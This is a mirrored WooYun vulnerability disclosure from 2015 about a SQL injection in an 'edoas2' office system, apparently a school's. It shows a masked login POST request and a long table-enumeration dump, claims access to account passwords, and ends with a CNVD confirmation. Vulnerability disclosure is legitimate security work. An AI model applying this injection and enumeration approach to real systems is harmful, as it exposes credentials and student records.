乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-17: 细节已通知厂商并且等待厂商处理中 2015-08-19: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-08-29: 细节向核心白帽子及相关领域专家公开 2015-09-08: 细节向普通白帽子公开 2015-09-18: 细节向实习白帽子公开 2015-10-03: 细节向公众公开
如题,没深入,估计会有学生的学籍信息
1、地址:http://**.**.**.**/edoas2/oa.jsp
POST /edoas2/member.jsp HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/edoas2/oa.jspCookie: JSESSIONID=2312993FEAFE26221A2D1276A1CDA341; JSESSIONID=9B54A40C2E914E663C227D216820CED9Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 56username=admin&pword=123456&submit2=%B5%C7+%C2%BC%28L%29
2、
3、
Database: edoas2[637 tables]+----------------------------------+| ACL_table || ALL_USERS || ANSWER_GROUP || ASP || AUTHOR || AdminUID || Affichage1 || Aircraft || Apply || BANNERDATA || BOOK || BUYER || Benutzername || Bestellungen || COLLECT_SITE || CONTENT || COURSE_SECTION || CPG_categories || CPG_config || Class_Display_Sequence || Clienti || ClientsTable || Cold || Component || CurrentUsers || CustomerCards || DEPT || DEPT_LOCATIONS || DM || DSObject_table || DUMMY || DWE_Corr_Sets || DWE_Internal_WF_Attributes || DWE_Predecessors || DWE_Roles || DWE_Tasks || D_Abbreviation || D_FA_ITENS || D_FA_PARCELAS || D_Format || D_PR_APENSOS || D_PR_EVENTOS || D_US_RECENTE || Device || EMAIL || EMPLEADOS || ENROLLMENT || EPIXEIRISI || Employee || ExtrinsicObject || FACTSHEET || FUNDGROUP || Factory_Output || FirstName || FoundThumbs || Fusion || Fusion8 || GalleryThumb || HISTORY || INSTITUTE || Island || Keyword || Kontakt || Kontrolle || LT_LANCAMENTO || LastLoginDate || MSmerge_errorlineage || M_FATURAS || M_RELATORIOS || MetadataFieldRegistry || Name || NextID_table || PN || PREFIX_customer_group || PREFIX_order_return_state_lang || PREFIX_product_attribute_image || PREFIX_tab || PREFIX_timezone || PUBLISHER || Pays || Plane || Publication || Purchases || QRTZ_BLOB_TRIGGERS || QRTZ_PAUSED_TRIGGER_GRPS || QRTZ_SIMPLE_TRIGGERS || R1Length || R1Sum || SALGRADE || SEQUENCE || SGA_XPLAN_TPL_DBA_TABLES || SGA_XPLAN_TPL_V$SQLTEXT_NL || SPJ || SQLDATES || SUBSCRIBE || Sitzungen || Standorte || Students || Subjects || TBLCORPORATEUSERS || TBLCORPUSERS || TBLLIST || TBLREPORTS || THOT_LANGUAGE || THOT_SUB_MENU || THOT_TYPE || Thumbnail || ThumbnailKeyword || UM_ROLE_PERMISSIONS || UM_USERS || UM_USER_ATTRIBUTES || UserFields || UserFieldsInfo || UserType || Webmaster || WidgetPrices || WidgetReferences || Widgets || ZENTRACK_VARFIELD || 4images_users || Action || Path || Time || User || account || account_temp || accounts || activity || ad || addressbookgrp || admin || admin_name || admin_userinfo || administer || administrable || administrables || administrateurs || adminrights || ads || agent_specialty || alarms || album || alias || appVersions || app_user || ar || archive || array_probe || article || articoli || articulos || arxeia || assembly || assignment || attivita || attributeCategory || audit || audittrail || auid || aut || authentication || autore || banned_users || bayviewpath || be_groups || binn_cform || bkp_ItemReference || bkp_ItemReplication || bkp_RS_Clusters || bombing || borrower || branch || business || cards || category || chatbox || child_configs || chip_layout || cia || cities || city || clients || cmContentRelation || cmContentTypeDefinition || cmDigitalAsset || cmSiteNode || cms_admins || cms_user || cmts_track || columns_priv || comboboxes || commissionEmployees || community_item_count || comp_group || company || computers || comuni || concessionnaire || conducts || conf || connections || contact || contacts || controle || correcaostrategy || country || course || cron_send || customers || customertax || cv_cropping_system || cv_pests_diseases || data || data_set_association || db || dbstaff || defertest || delete_reasons || departments || dependent || dept_location || derived_types || detail_table || discipline || div_aa_annotation || div_allele || div_allele_assay || div_annotation_type || div_experiment || div_locality || div_obs_unit || div_obs_unit_sample || div_poly_type || div_scoring_tech_type || div_stock || div_trait_uom || documento || dtb_bat_order_daily_hour || dtb_bat_relate_products || dtb_best_products || dtb_customer_mail_temp || dtb_deliv || dw || edge || egresado || egresadoxidiomaxhabilidad || emp || employees || empresa_atividade || emu_services || enregistrs || enrolled || entrants || entreprise || esame || event_log || evento || evidence || ew_menu || ew_user || exchange || exchangerate || extremes || facets || facturas || field || files_config || film || fk_test_has_pk || foreigntest2 || form_data_archive || form_definition_version_text || forum_user || forum_vote || fournisseur || friend2 || friends || func || geo_river || grandchild_test || groups || grupo || gruppi || guava_group_assignments || gws_jobs || gws_news || hero || hibernate_unique_key || hitcounter || hosts || identification || imageAttribute || imageCategoryList || imagelinks || ingredients || insurance || intUsers || internetaddress || interwiki || inventory || investigator || invoice || invoices || invoices_seq || ipassocs || ipmacassocs || ippaths || isDeleted_table || islandIn || item || items_template || jiveGroupUser || jiveID || jivePrivacyList || jivePrivate || jiveRemoteServerConf || jiveRosterGroups || jiveUserProp || jos_banner || jos_docman_groups || jos_groups || jos_menu_types || jos_messages || jos_newsfeeds || jos_polls || jos_stats_agents || jos_vm_auth_group || jos_vm_auth_user_vendor || jos_vm_currency || jos_vm_function || jos_vm_manufacturer || jos_vm_orders || jos_vm_payment_method || jos_vm_product_attribute || jos_vm_product_download || jos_vm_product_files || jos_vm_product_product_type_xref || jos_vm_product_reviews || jos_vm_product_type || jos_vm_product_votes || jos_vm_shipping_label || jos_vm_shopper_group || jos_vm_zone_shipping || keyboards || kurs || language_text || languages || lines || liste_domaines || locale || locatedOn || location || locus_data || logging || login || logins || logout || logs || m_admin || m_earnings || mac || main || massenmail || master_table || math || maxcodestudio || maxcodevento || meals || media || members || menu || message_statuses || metadata || mobile_menu || mobile_menu_text || modules || monthlabel || mucAffiliation || mucConversationLog || mucRoom || mushroom_testset || mwuser || my_lake || networking || networks || new || nlconfig || not_sent_mails || notes || nuke_gallery_pictures_newpicture || nuke_referer || nuke_subscriptions || nulltest || object || offers || officer || oil_bannertrack || oil_bfsurvey_pro || oil_bfsurvey_pro_example || oil_bfsurveypro_34 || oil_bfsurveypro_35 || oil_core_acl_aro || oil_google || oil_groups || oil_jf_content || oil_jf_tableinfo || oil_languages || oil_menu_types || oil_messages_cfg || oil_modules_menu || oil_newsfeeds || oil_phocadownload_licenses || oil_plugins || oil_poll_menu || oil_rokversions || oil_session || oldimage || operation || order_source || orders || ordreReparation || organization_seq || orgs || osc_categories_description || osc_manufacturers || osc_products || osc_products_attributes || osc_products_description || osc_products_images || osc_products_options || osc_reviews || osc_specials || package || pagelinks || part || partenaires || participate || partner || parts || partsgroup || partstax || passe || patient || payer || permission || person || personal || personnel || phpbb_config || phpbb_confirm || phpbb_privmsgs_text || phpbb_ranks || phpshop_system || physician || plugin || pma_column_info || pma_designer_coords || pma_history || pma_pdf_pages || pma_relation || pma_table_info || po_seq || pools || portale || posts || power || primarytest2 || procs_priv || product_related || product_size_multi || production_multiple || products || profession1 || profile_pictures || projects || promotion || protocol_action || publicationfile || pw || pwd1 || qrtz_calendars || qrtz_job_listeners || querycachetwo || question || queue_info || radacct || rating_track || rcpt || readers || recentchanges || reciprocal_partnersites || region || regions || register || registeration || report || request || resources || reviews || rights || room || root || routers || sales || salesorder || sampleData || sazog_urtiertoba_ge || sb_host_adminAffichage1name || searchindex || sections || seite_abschnitt || seite_layout || servers || service || services || sessions || setting || settings || sf_guard_permission || sf_guard_user_permission || shipment_line || shop_settings || sic || sing || singin || singup || site_stats || slserver || smallnuke_members || software || song || soraldo_ele_tipo || spip_messages || staff_db || stars_in_movies || statename || stnuser || study || study_text || stuseres || subImageInfo || superuser || supplier || synchro_type || sys || sys_acl_actions || sysmaps_links || system || table_user || tables_priv || tag || taikhoan || tamio_pelates || task || task_param || tax || tblOrders || tblStoneCategory || tblWishList || tbl_state || tbladmins || tblblogcomments || tblusers || team || templatelinks || term || test || tf_settings || tf_users || the || theday || tickers || time_zone || time_zone_transition_type || transcache || transport || turizmi_ge || type || un || url || userImageRating || user_groups || user_name || user_newtalk || user_password || user_role || user_usern || user_username || useres || userpwd || userrights || users || users_club || usr || utente || utilisateurs || utlisateur || vcd_Borrowers || vcd_Comments || vcd_Covers || vcd_MetaData || vcd_MovieCategories || vcd_RssFeeds || vcd_Screenshots || vcd_Sessions || vcd_SourceSites || vcd_UserLoans || vcd_UserRoles || vcd_UserWishList || vcd_Users || vcd_VcdToPornstars || vendor || versandkostenpreise || video || visits || vrls_partners || vrls_xref_country || vwListAllAvailable || vykachka || watchlist || ways || webapps || webcal_group || webcal_report || webcal_report_template || wh_der_children || win || works_on || wp_usermeta || xmldocument || yearend || zipcodes || zips || zoph_users || zuseserver || zutat || zutat_cocktail |+----------------------------------+
3、各种账号密码
4、表User中的内容
太多不跑了。。。
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-08-19 10:56
CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置。
暂无
